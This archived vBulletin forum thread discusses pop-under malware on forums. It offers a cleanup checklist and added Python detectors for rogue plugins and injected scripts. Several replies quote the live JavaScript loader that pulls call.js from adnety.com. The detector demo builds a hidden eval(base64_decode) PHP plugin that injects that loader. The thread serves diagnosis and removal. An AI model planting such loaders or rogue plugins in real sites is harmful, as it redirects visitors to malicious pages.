vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=252)
-   -   Pop Unders with false click..! (https://vborg.vbsupport.ru/showthread.php?t=323611)

socialteenz 10-11-2016 07:27 PM

Pop Unders with false click..!
 
So, basically I have been noticing many vb forums affected by this pop under malware..

What happens is, when you make a click on your site, the pop under appears and it redirects you to these sites..

adnety.com
clicknety.com
namefuze.com

Affected vBulletin Sites so far..

http://www.neogaf.com/forum/showthread.php?t=1229205&page=28

http://www.tsptalk.com/mb/report-problems/26162-pop-ups-anyone-still-seeing-them.html?

http://www.contractortalk.com/f45/virus-pop-up-301393/

https://forums.rajah.com/showthread.php?151343-Pop-ups


FIX:


Quote:

Originally Posted by Trevor Hannant (Post 2576857)
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.


Best Practices...



1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check your plugins list for any that are not part of a product you've added:

AdminCP > Plugins & Products > Plugin Manager

Any listed under 'vBulletin' at the top of the list should be examined carefully and removed if you're unsure as to what they are.

3) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

4) Update the following passwords in addition to your AdminCP:

- FTP
- Database

When updating the database password, ensure you also change your config.php file to use the new password otherwise your site won't be able to connect to the database.

5) Secure your AdminCP directory via .htaccess/.htpasswd.

Credits: Trevor Hannant
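
Added example for steps 2 and 3 of the checklist above (not code from the thread or from vBulletin): a small Python checker that runs over rows dumped from vBulletin's `plugin` table, flags anything filed under the 'vbulletin' product, flags obfuscation calls such as eval/base64_decode, and decodes long base64 literals to see whether the domains named in this thread are hidden inside. The sample rows, the `dbtech_thanks` product name and the `_PAYLOAD` string are constructed for the demo.

```python
import base64
import re

# Indicators from the thread plus the obfuscation calls step 3 of the checklist warns about.
INDICATOR_DOMAINS = ("adnety.com", "clicknety.com", "namefuze.com")
SUSPICIOUS_CALLS = ("base64_decode(", "eval(", "gzinflate(", "str_rot13(", "create_function(")
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

# Constructed rows shaped like vBulletin's `plugin` table (product, hookname, phpcode).
# Row 2 is the rogue plugin: filed under 'vbulletin' and hiding the adnety.com loader
# seen in this thread inside an eval(base64_decode(...)) wrapper.
_PAYLOAD = "$output = str_replace('</body>', '<script src=\"https://adnety.com/dashboard/call.js\"></script></body>', $output);"
SAMPLE_PLUGINS = [
    {"pluginid": 1, "product": "dbtech_thanks", "hookname": "postbit_display_complete",
     "phpcode": "$template_hook['postbit_end'] .= fetch_thanks($post);"},
    {"pluginid": 2, "product": "vbulletin", "hookname": "global_complete",
     "phpcode": "eval(base64_decode('%s'));" % base64.b64encode(_PAYLOAD.encode()).decode()},
]

def decode_base64_literals(code):
    """Decode every long base64-looking string literal in `code`; undecodable ones are skipped."""
    decoded = []
    for match in B64_LITERAL.finditer(code):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    return decoded

def scan_plugin(row):
    """Return the reasons a plugin row deserves inspection; an empty list means nothing was found."""
    reasons = []
    if row["product"].lower() == "vbulletin":
        reasons.append("filed under the 'vbulletin' product")
    code = row["phpcode"]
    for call in SUSPICIOUS_CALLS:
        if call in code:
            reasons.append("uses %s" % call.rstrip("("))
    decoded = decode_base64_literals(code)
    for domain in INDICATOR_DOMAINS:
        if domain in code:
            reasons.append("references %s" % domain)
        elif any(domain in text for text in decoded):
            reasons.append("references %s inside a base64 payload" % domain)
    return reasons

def scan_plugins(rows):
    """Map pluginid -> reasons for every row that tripped at least one check."""
    return {row["pluginid"]: scan_plugin(row) for row in rows if scan_plugin(row)}
```

Feed it the output of `SELECT pluginid, product, hookname, phpcode FROM plugin` and review every row it returns by hand; a "lite" addon with base64 in it will show up here too, which is the personal call step 3 describes.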

TheLastSuperman 10-11-2016 07:33 PM

More than likely hidden in a file, called via referencing a url... could or could not be in base64 format i.e. encrypted per se from reading heck not sure, will know more once I run into this first-hand as with all this crud these terd-nuggets (hacker folks) come up with :p.

socialteenz 10-11-2016 07:35 PM

Update:

The temporary fix to this issue is by disabling the plugin system.

Code:

define('DISABLE_HOOKS', true);

TheLastSuperman 10-11-2016 07:40 PM

This code is at the top of two of your sites listed, I'd check for that on the site you have access to.

On one site:
Code:

<script type="text/javascript">
var win = [];
win['webid'] = '22357fb864e954c229';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>

From a completely different site, similar code:
Code:

<script type="text/javascript">
var win = [];
win['webid'] = '78557fb86330ee36940';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>
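
Added example (not from the thread): a Python check for the symptom side, which pulls every inline script out of a saved copy of a page and reports the ones that create a script element pointing at a host outside an allowlist, along with the `webid` value if present. It generalises beyond the adnety.com loader to any dynamically inserted script of this shape. `ALLOWED_SCRIPT_HOSTS`, `SAMPLE_PAGE` and the `cdn.example.net` pixel are assumptions built for the demo; the loader inside `SAMPLE_PAGE` is the one quoted above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumed allowlist; adjust per site).
ALLOWED_SCRIPT_HOSTS = {"ajax.googleapis.com"}
CREATES_SCRIPT = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
DYNAMIC_SRC = re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]")
WEBID = re.compile(r"win\[['\"]webid['\"]\]\s*=\s*['\"]([0-9a-f]+)['\"]")

class InlineScriptCollector(HTMLParser):
    # Collects the body of every inline <script> (those without a src attribute).
    def __init__(self):
        super().__init__()
        self.in_inline, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self.in_inline = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_inline = False
    def handle_data(self, data):
        if self.in_inline:
            self.scripts[-1] += data

def find_injected_loaders(html):
    """One finding per inline script that builds a <script> element pointing outside the allowlist."""
    collector = InlineScriptCollector()
    collector.feed(html)
    findings = []
    for body in collector.scripts:
        if not CREATES_SCRIPT.search(body):
            continue  # inline code that creates no script element is not this loader pattern
        for url in DYNAMIC_SRC.findall(body):
            host = urlparse(url).hostname or ""
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                webid = WEBID.search(body)
                findings.append({"host": host, "src": url, "webid": webid.group(1) if webid else None})
    return findings

# Constructed page: an allowlisted jQuery include, the loader quoted in this thread, and an image .src (not reported).
SAMPLE_PAGE = """<html><head><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script type="text/javascript">
var win = []; win['webid'] = '22357fb864e954c229'; win['traffic'] = '0'; win['raw'] = '2'; win['pop'] = '0';
(function() { var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0]; pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp); })();
</script><script>var img = new Image(); img.src = 'https://cdn.example.net/pixel.png';</script></head><body></body></html>"""
```

Run it against the HTML the server actually sends (saved with curl or the browser's "view source"), not against your templates, since the injection happens at output time via the hook.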


socialteenz 10-11-2016 07:51 PM

The site which I have access to is undergoing a server update, I will get you the details once it's done.

This was the code found on their site..

Code:

<script type="text/javascript">
var win = [];
win['webid'] = '46157fb85796a03666';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script');
pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>


TheLastSuperman 10-11-2016 07:53 PM

Quote:

Originally Posted by socialteenz (Post 2576843)
The site which I have access to is undergoing a server update, I will get you the details once it's done.

This was the code found on their site..

PHP Code:

<script type="text/javascript">
var win = [];
win['webid'] = '46157fb85796a03666';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script');
pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>


Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way ;). Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).

socialteenz 10-11-2016 07:56 PM

Quote:

Originally Posted by TheLastSuperman (Post 2576844)
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way ;). Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).

Sure, thanks for the info.

I am super sleepy as well, 3:25AM at my side of the world.

Trevor Hannant 10-12-2016 08:21 AM

Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

socialteenz 10-12-2016 06:57 PM

Quote:

Originally Posted by Trevor Hannant (Post 2576857)
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

Yup, right on.

Thanks.


All times are GMT. The time now is 02:52 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
